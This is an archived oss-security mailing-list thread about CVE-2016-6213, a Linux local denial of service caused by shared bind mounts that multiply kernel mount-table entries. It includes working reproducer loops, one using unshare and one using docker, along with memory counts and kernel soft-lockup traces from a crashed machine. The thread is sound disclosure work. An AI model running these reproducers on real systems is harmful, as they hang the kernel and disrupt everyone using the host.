|
Message-ID: <4DCEEA06-5F41-4412-B7FC-F550DB74527C@nccgroup.trust>
Date: Fri, 15 Jul 2016 15:00:38 +0000
From: Jesse Hertz <Jesse.Hertz@...group.trust>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: cve request: local DoS by overflowing kernel mount
table using shared bind mount
I can confirm that, crashed a VM last night with an almost identical command :)
> On Jul 15, 2016, at 10:35 AM, CAI Qian <caiqian@...hat.com> wrote:
>
> Also, it is exploitable without docker but with only user namespace enabled.
>
> $ unshare -r -m --propagation shared
> # for i in `seq 1 30`; do mount -o bind ~/src/ ~/des/; done
>
> Tested it on this large memory machine. consumed 1.5G memory to create 8388640
> entries in the mount table. Immediately afterwards, NMI watchdog/soft-lockup
> kicked in and the kernel is dead.
> CAI Qian
>
> $ unshare -m -r --propagation shared
> # for i in `seq 1 30`; do mount -o bind ~/src/ ~/des/; free -m; mount | wc -l ; done
> total used free shared buff/cache available
> Mem: 128493 421 127672 8 399 127326
> Swap: 4095 0 4095
> 34
> total used free shared buff/cache available
> Mem: 128493 421 127671 8 399 127325
> Swap: 4095 0 4095
> 36
> total used free shared buff/cache available
> Mem: 128493 422 127671 8 399 127324
> Swap: 4095 0 4095
> 40
> total used free shared buff/cache available
> Mem: 128493 423 127670 8 399 127324
> Swap: 4095 0 4095
> 48
> total used free shared buff/cache available
> Mem: 128493 423 127669 8 399 127323
> Swap: 4095 0 4095
> 64
> total used free shared buff/cache available
> Mem: 128493 424 127669 8 399 127322
> Swap: 4095 0 4095
> 96
> total used free shared buff/cache available
> Mem: 128493 425 127668 8 399 127322
> Swap: 4095 0 4095
> 160
> total used free shared buff/cache available
> Mem: 128493 426 127667 8 399 127321
> Swap: 4095 0 4095
> 288
> total used free shared buff/cache available
> Mem: 128493 426 127667 8 399 127320
> Swap: 4095 0 4095
> 544
> total used free shared buff/cache available
> Mem: 128493 426 127666 8 400 127320
> Swap: 4095 0 4095
> 1056
> total used free shared buff/cache available
> Mem: 128493 426 127665 8 400 127319
> Swap: 4095 0 4095
> 2080
> total used free shared buff/cache available
> Mem: 128493 427 127664 8 401 127318
> Swap: 4095 0 4095
> 4128
> total used free shared buff/cache available
> Mem: 128493 428 127662 8 403 127316
> Swap: 4095 0 4095
> 8224
> total used free shared buff/cache available
> Mem: 128493 428 127658 8 406 127311
> Swap: 4095 0 4095
> 16416
> total used free shared buff/cache available
> Mem: 128493 431 127648 8 413 127302
> Swap: 4095 0 4095
> 32800
> total used free shared buff/cache available
> Mem: 128493 434 127631 8 428 127284
> Swap: 4095 0 4095
> 65568
> total used free shared buff/cache available
> Mem: 128493 443 127594 8 456 127247
> Swap: 4095 0 4095
> 131104
> total used free shared buff/cache available
> Mem: 128493 458 127521 8 513 127175
> Swap: 4095 0 4095
> 262176
> total used free shared buff/cache available
> Mem: 128493 491 127374 8 627 127028
> Swap: 4095 0 4095
> 524320
> total used free shared buff/cache available
> Mem: 128493 559 127081 8 852 126734
> Swap: 4095 0 4095
> 1048608
> total used free shared buff/cache available
> Mem: 128493 688 126496 8 1308 126150
> Swap: 4095 0 4095
> 2097184
> total used free shared buff/cache available
> Mem: 128493 961 125314 8 2216 124968
> Swap: 4095 0 4095
> 4194336
> total used free shared buff/cache available
> Mem: 128493 1506 122953 8 4033 122607
> Swap: 4095 0 4095
> 8388640
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#12 stuck for 23s! [mount:4250]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#0 stuck for 22s! [NetworkManager:1971]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#3 stuck for 23s! [systemd-journal:1749]
> total used free shared buff/cache available
> Mem: 128493 2600 118223 8 7669 117877
> Swap: 4095 0 4095
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#4 stuck for 23s! [irqbalance:1972]
>
> Message from syslogd@...-x3755-02 at Jul 14 17:01:52 ...
> kernel:NMI watchdog: BUG: soft lockup - CPU#14 stuck for 22s! [sendmail:2533]
>
> [ 5773.628802] NMI watchdog: BUG: soft lockup - CPU#12 stuck for 23s! [mount:4250]
> [ 5773.636139] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5773.685984] CPU: 12 PID: 4250 Comm: mount Not tainted 4.7.0-rc7 #1
> [ 5773.692176] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5773.704001] task: ffff8807f5968000 ti: ffff880731310000 task.ti: ffff880731310000
> [ 5773.711485] RIP: 0010:[<ffffffff8123ac38>] [<ffffffff8123ac38>] __lookup_mnt+0x58/0x80
> [ 5773.719535] RSP: 0018:ffff880731313dc0 EFLAGS: 00000282
> [ 5773.724862] RAX: ffff8807e0e75980 RBX: ffff8817b6e36420 RCX: 0000000000000012
> [ 5773.732005] RDX: ffff881780933d80 RSI: ffff8807fb7af500 RDI: ffff8817b6e36420
> [ 5773.739146] RBP: ffff880731313dc0 R08: 0000000000000000 R09: ffffe8ffdfd82ae0
> [ 5773.746293] R10: 0000000000001570 R11: 0000000000002ad9 R12: ffff8807fb7af500
> [ 5773.753428] R13: ffff881ff97835c0 R14: 0000000000000000 R15: 0000000000000000
> [ 5773.760574] FS: 00007fa36b919880(0000) GS:ffff88201fc00000(0000) knlGS:0000000000000000
> [ 5773.768663] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5773.774443] CR2: 00007f8bedaba000 CR3: 0000000fc9707000 CR4: 00000000000006e0
> [ 5773.781587] Stack:
> [ 5773.783615] ffff880731313de0 ffffffff8123ac77 ffff88178f268300 ffff88178f268180
> [ 5773.791116] ffff880731313e28 ffffffff8123b1bb ffff88178f268180 00000000ad5522bc
> [ 5773.798639] ffff881ff97835c0 ffff881fc90eb1a0 ffff880fc7d0a880 0000000000000000
> [ 5773.806168] Call Trace:
> [ 5773.808632] [<ffffffff8123ac77>] __lookup_mnt_last+0x17/0x80
> [ 5773.814402] [<ffffffff8123b1bb>] attach_recursive_mnt+0x10b/0x230
> [ 5773.820584] [<ffffffff8123b32f>] graft_tree+0x4f/0x60
> [ 5773.825737] [<ffffffff8123ca43>] do_mount+0xc33/0xdb0
> [ 5773.830887] [<ffffffff811f69af>] ? __kmalloc_track_caller+0x1af/0x250
> [ 5773.837424] [<ffffffff811afb71>] ? strndup_user+0x41/0x80
> [ 5773.842918] [<ffffffff811afa92>] ? memdup_user+0x42/0x70
> [ 5773.848328] [<ffffffff8123ced3>] SyS_mount+0x83/0xd0
> [ 5773.853403] [<ffffffff81003b12>] do_syscall_64+0x62/0x110
> [ 5773.858910] [<ffffffff816c6921>] entry_SYSCALL64_slow_path+0x25/0x25
> [ 5773.865364] Code: b2 00 48 8b 15 12 2e b2 00 48 8d 04 c2 48 8b 10 31 c0 48 85 d2 75 10 5d c3 48 39 72 18 74 21 48 8b 12 48 85 d2 74 15 48 8b 42 10 <48> 83 c0 20 48 39 c7 74 e5 48 8b 12 48 85 d2 75 eb 31 c0 5d c3
> [ 5780.883837] NMI watchdog: BUG: soft lockup - CPU#0 stuck for 22s! [NetworkManager:1971]
> [ 5780.891840] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5780.940715] CPU: 0 PID: 1971 Comm: NetworkManager Tainted: G L 4.7.0-rc7 #1
> [ 5780.948798] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5780.960609] task: ffff8817f9508000 ti: ffff8817f9ba8000 task.ti: ffff8817f9ba8000
> [ 5780.968089] RIP: 0010:[<ffffffff812253e3>] [<ffffffff812253e3>] path_init+0x2b3/0x340
> [ 5780.976037] RSP: 0018:ffff8817f9babc90 EFLAGS: 00000202
> [ 5780.981347] RAX: 0000000002000521 RBX: ffff8817f9babdb0 RCX: ffff8807f9853e00
> [ 5780.988478] RDX: ffffffff8221bbc8 RSI: 0000000000000041 RDI: ffff8817f9babdb0
> [ 5780.995608] RBP: ffff8817f9babcc0 R08: 000000000001b2c0 R09: ffff8807f9699180
> [ 5781.002732] R10: 0000000000000020 R11: 0000000000000020 R12: 0000000000000041
> [ 5781.009863] R13: ffff8807fbc9a01c R14: 000000007fffffff R15: ffff8817f9babdb0
> [ 5781.016988] FS: 00007f422f41d8c0(0000) GS:ffff8807ffc00000(0000) knlGS:0000000000000000
> [ 5781.025072] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5781.030818] CR2: 00007f8bed0c6fed CR3: 0000000ff898d000 CR4: 00000000000006f0
> [ 5781.037950] Stack:
> [ 5781.039969] ffff8807f926b140 0000000000000011 ffff8817f9babecc ffff8817f9babecc
> [ 5781.047430] 000000007fffffff ffff8817f9babdb0 ffff8817f9babda0 ffffffff81227391
> [ 5781.054891] 0000001c00000000 0000000003082263 ffffffff8159588d 0000000003082263
> [ 5781.062350] Call Trace:
> [ 5781.064799] [<ffffffff81227391>] path_openat+0x81/0x1370
> [ 5781.070202] [<ffffffff8159588d>] ? move_addr_to_user+0x8d/0xc0
> [ 5781.071838] NMI watchdog: BUG: soft lockup - CPU#3 stuck for 23s! [systemd-journal:1749]
> [ 5781.071872] Modules linked in: ipmi_ssif nfsd kvm_amd kvm auth_rpcgss nfs_acl ses lockd enclosure ipmi_devintf scsi_transport_sas irqbypass ipmi_si ibmpex ibmaem sg shpchp ipmi_msghandler i2c_piix4 k10temp pcspkr acpi_cpufreq grace sunrpc ip_tables xfs libcrc32c sd_mod sr_mod cdrom radeon i2c_algo_bit drm_kms_helper syscopyarea sysfillrect sysimgblt ata_generic fb_sys_fops ixgbe pata_acpi ttm e1000e lpfc drm mdio pata_serverworks dca aacraid libata ptp serio_raw bnx2 scsi_transport_fc pps_core i2c_core dm_mirror dm_region_hash dm_log dm_mod
> [ 5781.071876] CPU: 3 PID: 1749 Comm: systemd-journal Tainted: G L 4.7.0-rc7 #1
> [ 5781.071877] Hardware name: IBM IBM System x3755 -[71635RU]-/System Planar, BIOS IBM BIOS Version 1.04 -[C8E133AUS-1.04]- 08/31/2009
> [ 5781.071879] task: ffff8807f7906680 ti: ffff881ff8828000 task.ti: ffff881ff8828000
> [ 5781.071891] RIP: 0010:[<ffffffff812253db>] [<ffffffff812253db>] path_init+0x2ab/0x340
> [ 5781.071892] RSP: 0018:ffff881ff882ba88 EFLAGS: 00000202
> [ 5781.071893] RAX: 0000000002000521 RBX: ffff881ff882baf0 RCX: ffff881ff882bc30
> [ 5781.071894] RDX: ffff881ff882bc30 RSI: 0000000000000041 RDI: ffff881ff882baf0
> [ 5781.071895] RBP: ffff881ff882bab8 R08: 0000000000000000 R09: ffffffff812286ab
> [ 5781.071896] R10: ffff8807ff8032c0 R11: 0000000000000016 R12: 0000000000000041
> [ 5781.071897] R13: ffff8807f9e9601c R14: 0000000000000001 R15: 000000000000000a
> [ 5781.071898] FS: 00007f1f25f29880(0000) GS:ffff8807ffd80000(0000) knlGS:0000000000000000
> [ 5781.071900] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 5781.071900] CR2: 00007f4ed9306000 CR3: 0000000ff97ba000 CR4: 00000000000006e0
> [ 5781.071901] Stack:
> [ 5781.071903] ffffffff810b3929 ffff881ff882baf0 ffff881ff882bc30 ffff881ff882bc30
> [ 5781.071905] 0000000000000001 000000000000000a ffff881ff882bae0 ffffffff81226ffb
> [ 5781.071906] ffff8807ff8032c0 0000000000000001 ffff8807f9e96000 ffff881ff882bbf0
> [ 5781.071907] Call Trace:
> [ 5781.071916] [<ffffffff810b3929>] ? ttwu_do_wakeup+0x19/0xe0
> [ 5781.071920] [<ffffffff81226ffb>] path_lookupat+0x1b/0x110
> [ 5781.071922] [<ffffffff81228c3f>] filename_lookup+0xaf/0x190
> [ 5781.071930] [<ffffffff8159de11>] ? __kmalloc_reserve.isra.35+0x31/0x90
> [ 5781.071933] [<ffffffff8159fbe1>] ? __alloc_skb+0xa1/0x2b0
> [ 5781.071936] [<ffffffff811f329b>] ? kmem_cache_alloc+0x18b/0x1f0
> [ 5781.071937] [<ffffffff812286ab>] ? getname_kernel+0x2b/0x110
> [ 5781.071939] [<ffffffff81228d4b>] kern_path+0x2b/0x30
> [ 5781.071948] [<ffffffff816642c5>] unix_find_other+0x45/0x240
> [ 5781.071951] [<ffffffff815a5d0a>] ? skb_copy_datagram_from_iter+0x5a/0x1f0
> [ 5781.071953] [<ffffffff81664fa1>] unix_dgram_sendmsg+0x451/0x690
> [ 5781.071956] [<ffffffff81596af8>] sock_sendmsg+0x38/0x50
> [ 5781.071957] [<ffffffff81597449>] ___sys_sendmsg+0x279/0x290
> [ 5781.071958] [<ffffffff811f3401>] ? kmem_cache_alloc_trace+0x101/0x210
> [ 5781.071960] [<ffffffff811f32e6>] ? kmem_cache_alloc+0x1d6/0x1f0
> [ 5781.071966] [<ffffffff812cd5d7>] ? selinux_file_alloc_security+0x37/0x60
> [ 5781.071968] [<ffffffff812cd5d7>] ? selinux_file_alloc_security+0x37/0x60
> [ 5781.071974] [<ffffffff812c7543>] ? security_file_alloc+0x33/0x50
> [ 5781.071981] [<ffffffff8121b3cf>] ? get_empty_filp+0xcf/0x1a0
> [ 5781.071983] [<ffffffff81597e54>] __sys_sendmsg+0x54/0x90
> [ 5781.071984] [<ffffffff81597ea2>] SyS_sendmsg+0
>
> ----- Original Message -----
>> From: "CAI Qian" <caiqian@...hat.com>
>> To: "Greg KH" <greg@...ah.com>
>> Cc: oss-security@...ts.openwall.com, cve-assign@...re.org
>> Sent: Thursday, July 14, 2016 12:15:02 PM
>> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
>>
>> Maybe this is a better reproducer using docker. It is exploitable even with
>> user namespace enabled.
>>
>> # docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash
>>
>> # cat /proc/self/uid_map
>> 0 995 65536
>>
>> # cat /proc/self/gid_map
>> 0 992 65536
>>
>> (insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done
>> CAI Qian
>>
>> ----- Original Message -----
>>> From: "Greg KH" <greg@...ah.com>
>>> To: oss-security@...ts.openwall.com
>>> Cc: caiqian@...hat.com, cve-assign@...re.org
>>> Sent: Wednesday, July 13, 2016 6:45:00 PM
>>> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing
>>> kernel mount table using shared bind mount
>>>
>>> On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign@...re.org wrote:
>>>>> It was reported that the mount table expands by a power-of-two
>>>>> with each bind mount command.
>>>>
>>>>> If the system is configured in the way that a non-root user
>>>>> allows bind mount even if with limit number of bind mount
>>>>> allowed, a non-root user could cause a local DoS by quickly
>>>>> overflow the mount table.
>>>>
>>>>> it will cause a deadlock for the whole system,
>>>>
>>>>>> form of unlimited memory consumption that is causing the problem
>>>>
>>>> Use CVE-2016-6213.
>>>
>>> A CVE for an "improperly configured system"? Huh? What distro has such
>>> a configuration set by default? This isn't a kernel bug, so what is
>>> this CVE classified as being "against"? It better not be against the
>>> Linux kernel...
>>>
>>> confused,
>>>
>>> greg k-h
>>>
>
Download attachment "signature.asc" of type "application/pgp-signature" (497 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.